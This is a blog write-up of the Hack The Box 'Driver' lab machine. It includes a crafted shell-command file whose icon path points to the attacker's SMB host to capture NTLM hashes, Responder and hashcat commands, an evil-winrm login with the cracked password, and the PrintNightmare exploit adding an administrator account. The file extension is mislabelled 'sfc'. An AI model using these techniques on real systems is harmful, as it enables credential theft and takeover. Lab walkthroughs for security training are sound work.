Driver HTB

Driver HTB Writeup | HacktheBox

Introduction

In this post, You will learn how to CTF driver from HTB and if you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.

Let’s Hack Perfection HTB 😌

https://twitter.com/HacklikeHacker

User

I began by using nmap and noticed that there were a couple of open ports. Specifically, I found port 80, 5985 (HTTP), and 135, 445 (SMB).

PORT     STATE SERVICE      VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

When I visited the web server on port 80, I discovered that it hosted a static website focused on firmware updates for printers. As I explored further, I stumbled upon a page that permitted me to upload firmware files.

Considering the information provided on the page, which indicated that uploaded files were stored in a file share and subjected to manual checks, I suspected a connection to the SMB server identified in the nmap scan results.

Despite my attempts to upload PHP reverse shells in hopes of obtaining a shell access, I was unsuccessful. This prompted me to delve deeper into the situation. While researching, I stumbled upon an article discussing SFC file attacks associated with SMB shares.

Following the guidance outlined in the article, I created an SFC file named “attack.sfc.”

[Shell]  
Command=2
IconFile=\\10.10.14.235\test\test.ico
[Taskbar]
Command=ToggleDesktop

After creating the “attack.sfc” file, I proceeded to start a Responder service.

sudo responder -I tun0 -vv

To complete the process, I uploaded the “attack.sfc” file that I had created earlier. Subsequently, I successfully obtained the NTLM hash associated with the “tony” user.


It appears that when the “attack.sfc” file was uploaded, the “tony” user likely accessed the SMB server and viewed the file. Because the Iconfile contained a pointer to our SMB server, Responder intercepted the hash associated with the “tony” user.

Following this, I utilized hashcat to crack the captured hash.

hashcat -m 5600 --force hash.txt rockyou.txt

With the obtained password, “liltony,” I proceeded to utilize evil-winrm to log in to the system as the “tony” user.

I used the command “evil-winrm.rb -u tony -p liltony -i 10.10.11.106” to initiate the login process as the “tony” user with the password “liltony” on the IP address 10.10.11.106.

evil-winrm.rb -u tony -p liltony -i 10.10.11.106

Root

To start, I uploaded and executed winpeas.exe to perform basic enumeration. Although I didn’t stumble upon any glaring vulnerabilities, I did notice that the “spoolsv” service was running.

After some research on the “spoolsv” service, I came across information about a vulnerability known as PrintNightmare. This exploit targets a native Windows service called “Print Spooler,” which is typically enabled by default on Windows systems.

Following further investigation, I managed to locate a PowerShell exploit for PrintNightmare on GitHub.

Before executing the PowerShell script, I needed to make some adjustments to the Execution Policy to allow the import of the PowerShell module I uploaded to the system.

set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Following the instructions outlined in the README.md file, I imported the PowerShell script and proceeded to execute it.

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare

Upon running the script, a new user named “adm1n” was added to the administrator group with the password “P@ssw0rd”. Subsequently, I successfully logged in using these credentials, gaining administrative access to the machine.

Conclusion

Rooted! 🎉

If you have any questions or need further assistance, feel free to drop them in the comments below. I’m here to help!

Leave a Comment

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top